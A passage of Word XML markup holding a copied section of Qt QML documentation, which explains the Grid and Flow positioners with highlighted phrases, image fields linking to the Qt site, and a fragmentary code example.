      <w:hyperlink r:id="rId2374" w:anchor="grid" w:history="1">
        <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Grid</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AB77F1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">items are used to place items in a </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="00AB77F1">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>grid or table arrangement</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. The following example uses a Grid item to place four</w:t>
      </w:r>
      <w:r w:rsidR="008A2AAC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2375" w:history="1">
        <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Rectangle</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008A2AAC">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>items in a 2-by-2 grid. As with the other positioners, the spacing between items can be specified using the</w:t>
      </w:r>
      <w:r w:rsidR="008A2AAC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId2376" w:anchor="spacing-prop" w:history="1">
        <w:r w:rsidR="000B7D73" w:rsidRPr="008A2AAC">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>spacing</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008A2AAC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property.</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kwd"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFF55"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>import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QtQuick</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112</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112</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"#303030"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Grid</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anchors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horizontalCenter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parent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horizontalCenter</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anchors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verticalCenter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parent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verticalCenter</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columns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spacing</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6</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"#aa6666"</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50</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"#aaaa66"</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50</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"#9999aa"</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50</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"#6666aa"</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50</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Fonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">There is no difference between horizontal and vertical spacing inserted between items, so any </w:t>
      </w:r>
      <w:r w:rsidRPr="008A2AAC">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>additional space</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> must be added within the items themselves.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Any </w:t>
      </w:r>
      <w:r w:rsidRPr="008A2AAC">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>empty cells</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the grid </w:t>
      </w:r>
      <w:r w:rsidRPr="008A2AAC">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> be created by </w:t>
      </w:r>
      <w:r w:rsidRPr="008A2AAC">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>defining placeholder</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> items at the appropriate places in the Grid definition.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="008B1DCE">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2004" w:name="flow"/>
      <w:bookmarkStart w:id="2005" w:name="_Toc483000964"/>
      <w:bookmarkStart w:id="2006" w:name="_Toc483003955"/>
      <w:bookmarkStart w:id="2007" w:name="_Toc483604307"/>
      <w:bookmarkStart w:id="2008" w:name="_Toc483605527"/>
      <w:bookmarkEnd w:id="2004"/>
      <w:r w:rsidRPr="008B1DCE">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Flow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2005"/>
      <w:bookmarkEnd w:id="2006"/>
      <w:bookmarkEnd w:id="2007"/>
      <w:bookmarkEnd w:id="2008"/>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="000B7D73" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="360" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-flow-text1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2" w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00983E72" w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00123160" w:rsidRPr="00123160">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0072163C" w:rsidRPr="001B3733">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EC78A6">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00EC78A6" w:rsidRPr="00EC78A6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00EC78A6">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C10CB8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C10CB8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006F4DE5">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006F4DE5" w:rsidRPr="00250096">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="006F4DE5">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F83200" w:rsidRPr="007A24CD">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B947D3">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B947D3" w:rsidRPr="00B947D3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B947D3">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002352BA" w:rsidRPr="002352BA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00700D31" w:rsidRPr="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00490E7E" w:rsidRPr="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text1.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1071" type="#_x0000_t75" alt="" style="width:115.2pt;height:1in">
            <v:imagedata r:id="rId2377" r:href="rId2378"/>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0B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "http://doc.qt.io/qt-5/images/qml-flow-text2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="005A2BD2" w:rsidRPr="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00983E72" w:rsidRPr="00230BC0">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00983E72">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00123160" w:rsidRPr="00123160">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00123160">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="0072163C" w:rsidRPr="001B3733">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="0072163C">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00EC78A6">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00EC78A6" w:rsidRPr="00EC78A6">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00EC78A6">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00C10CB8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00C10CB8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="006F4DE5">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="006F4DE5" w:rsidRPr="00250096">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="006F4DE5">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00F83200" w:rsidRPr="007A24CD">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00F83200">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00B947D3">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00B947D3" w:rsidRPr="00B947D3">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00B947D3">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="002352BA" w:rsidRPr="002352BA">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="002352BA">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00700D31" w:rsidRPr="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00700D31">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00490E7E" w:rsidRPr="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "http://doc.qt.io/qt-5/images/qml-flow-text2.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00490E7E">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="002230B8">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:pict>
          <v:shape id="_x0000_i1072" type="#_x0000_t75" alt="" style="width:136.5pt;height:1in">
            <v:imagedata r:id="rId2379" r:href="rId2380"/>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005A2BD2">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="000B7D73" w:rsidRPr="000B7D73" w:rsidRDefault="00490E7E" w:rsidP="000B7D73">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2381" w:anchor="flow" w:history="1">
        <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:color w:val="17A81A"/>
            <w:u w:val="none"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Flow</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="008A2AAC">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">items are used to place </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="008A2AAC">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>items like words on a page</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, with rows or columns of </w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="008A2AAC">
        <w:rPr>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>non-overlapping</w:t>
      </w:r>
      <w:r w:rsidR="000B7D73" w:rsidRPr="000B7D73">
